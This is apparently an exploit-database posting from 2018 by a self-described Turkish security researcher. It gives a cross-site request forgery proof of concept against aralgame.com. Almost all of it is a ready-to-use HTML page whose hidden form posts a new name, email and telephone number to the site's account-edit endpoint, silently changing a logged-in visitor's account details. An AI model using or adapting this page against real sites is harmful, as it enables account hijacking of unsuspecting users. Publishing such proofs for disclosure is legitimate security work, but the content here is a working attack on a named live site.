Hi My name is Yusuf Furkan Turkey/aralgame CSRF Poc in aralgame.com exploit title;Turkey/aralgame CSRF Poc in aralgame.com author:Yusuf Furkan twitter:R3DC0D3R1 Date:03.05.2018 <html> <!-- CSRF PoC - generated by Yusuf --> <body> <script>history.pushState('', '', '/')</script> <form action="https://www.aralgame.com/index.php?route=account/edit" method="POST"> <input type="hidden" name="firstname" value="testedt" /> <input type="hidden" name="lastname" value="testedd" /> <input type="hidden" name="email" value="tested&#64;gmail&#46;com" /> <input type="hidden" name="telephone" value="5555551234" /> <input type="hidden" name="fax" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> NOTE:Turkish web application security researcher